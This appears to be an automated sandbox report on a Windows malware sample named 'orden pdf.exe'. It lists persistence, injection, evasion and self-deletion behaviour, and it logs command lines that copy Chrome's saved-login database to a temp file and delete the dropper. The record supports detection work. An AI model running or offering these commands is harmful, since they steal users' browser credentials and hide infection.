          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: orden pdf.exeVirustotal: Detection: 50%
          Source: orden pdf.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\Desktop\orden pdf.exeFile read: C:\Users\user\Desktop\orden pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\orden pdf.exe 'C:\Users\user\Desktop\orden pdf.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: unknownProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
          Source: unknownProcess created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
          Source: C:\Users\user\Desktop\orden pdf.exeProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: C:\Users\user\Desktop\orden pdf.exeProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32
          Source: C:\Windows\SysWOW64\systray.exeFile written: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: orden pdf.exeStatic file information: File size 1550336 > 1048576
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: orden pdf.exe
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018E01E LoadLibraryA,GetProcAddress,
          Source: DeviceCensus.exe.exe.0.drStatic PE information: real checksum: 0x12169b should be: 0x18746f
          Source: cx9l_rq2dula.exe.3.drStatic PE information: real checksum: 0x12169b should be: 0x18746f
          Source: orden pdf.exeStatic PE information: real checksum: 0x12169b should be: 0x18746f
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018288B push 66001823h; retn 001Eh
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00196B05 push ecx; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0018288B push 66001823h; retn 001Eh
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00196B05 push ecx; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041681F push eax; retf
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00417BCB push ecx; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C6C5 push eax; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C77C push eax; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C712 push eax; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C71B push eax; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017BD0D1 push ecx; ret
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_01396B05 push ecx; ret
          Source: C:\Users\user\Desktop\orden pdf.exeFile created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exeJump to dropped file
          Source: C:\Users\user\Desktop\orden pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.urlJump to behavior
          Source: C:\Users\user\Desktop\orden pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.urlJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x93 0x37
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0018EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0019123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\orden pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\orden pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\orden pdf.exeRDTSC instruction interceptor: First address: 00000000004098B4 second address: 00000000004098BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\orden pdf.exeRDTSC instruction interceptor: First address: 0000000000409B2E second address: 0000000000409B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000009398B4 second address: 00000000009398BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000000939B2E second address: 0000000000939B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00409A60 rdtsc
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\explorer.exe TID: 6660Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 5592Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BF56F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BF56F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,
          Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000003.555421786.00000000089C5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluser
          Source: explorer.exe, 00000003.00000000.266986539.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.257961088.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.267948920.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.258035922.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\orden pdf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\orden pdf.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00409A60 rdtsc
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0040AE10 LdrLoadDll,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C6AAF BlockInput,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00173D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018E01E LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_3_014600AD mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_3_014600AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_3_014601CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0178B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0178B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01784120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0178C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0177B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0177B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0177B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0177B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01834015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01834015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01822073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01769080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01831074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0181D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0182138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01835BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0182131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01838B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01771B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01771B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01769240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01769240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01769240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01769240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0181B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0181B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179D294 mov eax, dword ptr fs:[00000030h]
